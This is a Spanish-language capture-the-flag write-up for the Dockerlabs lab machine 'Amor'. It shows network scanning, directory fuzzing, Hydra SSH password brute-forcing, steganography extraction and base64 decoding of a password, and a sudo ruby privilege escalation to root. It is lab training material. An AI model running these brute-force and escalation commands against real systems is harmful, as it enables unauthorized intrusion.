Amor

Fácil
22/08/2024
Dockerlabs.es
Escaneo
Lo primero que realizaremos será revisar nuestra interfaz de red con ifconfig -a
, para saber a que segmento apuntaremos nuestros escaneos.

Ya con el segmento en vista y la interfaz, realizaremos una consulta a la red con el siguiente comando:
sudo netdiscover -i docker0 -r 172.17.0.0/24

Ya con la búsqueda en la red resulta, realizaremos una búsqueda con nmap
Nmap (Network Mapper)sudo nmap --min-rate 5000 -p- -sS -sV 172.17.0.2
La búsqueda nos devuelve que hay dos puertos abiertos, el 22 y el 80

Abrimos el navegador para revisar el servicio del puerto 80

A la vista no se encuentra nada, así que realizamos un fuzzing para ver si encontrábamos algo, pero adelanto... sin éxito, no hay amor en el sitio web...
gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

A esta altura el servicio web no nos dio el amor que buscábamos, pero si nos quedamos con la pista de carlota y juan, así que intentaremos con Hydra por SSH con esos usuarios.
Conexión SSH
HydraEjecutamos el siguiente comando de hydra, el cual nos da una respuesta positiva al fin.
hydra -l carlota -p /home/kali/Desktop/rockyou.txt ssh://172.17.0.2

Realizamos la conexión SSH con los datos obtenidos:

Navegamos a la siguiente ruta:
cd /carlota/Desktop/fotos/vacaciones
En donde encontrarás un archivo llamado imagen.jpg
Para descargarlo más facil, levanto un servicio web con el comando python3 -m http.server

La imagen descargada es la siguiente:

Esteganografía
Ya es sospechoso que solo exista una imagen entre las rutas, por lo cual decidimos realizar una consulta de esteganografía con steghide

Dentro del archivo secret.txt encontraremos el siguiente código:
Realizamos una busqueda para saber que tipo de codificación es y nos da por resultado que es base64, así que realizamos una decodificación:
echo "ZXNsYWNhc2FkZXBpbnlwb24=" | base64 -d; echo
Probamos la contraseña con la usuaria carlota, lo que nos devuelve que la contraseña no corresponde

Revisamos los otros usuarios y decidimos probar con la cuenta oscar su oscar
sudo -l vemos que tenemos acceso a la consola de ruby y la ejecutamos sudo /usr/bin/ruby -e 'exec "/bin/bash"'

Finalmente hacemos un whoami
y veremos que somos root !Tachan¡ 🎆 🍺

Última actualización
¿Te fue útil?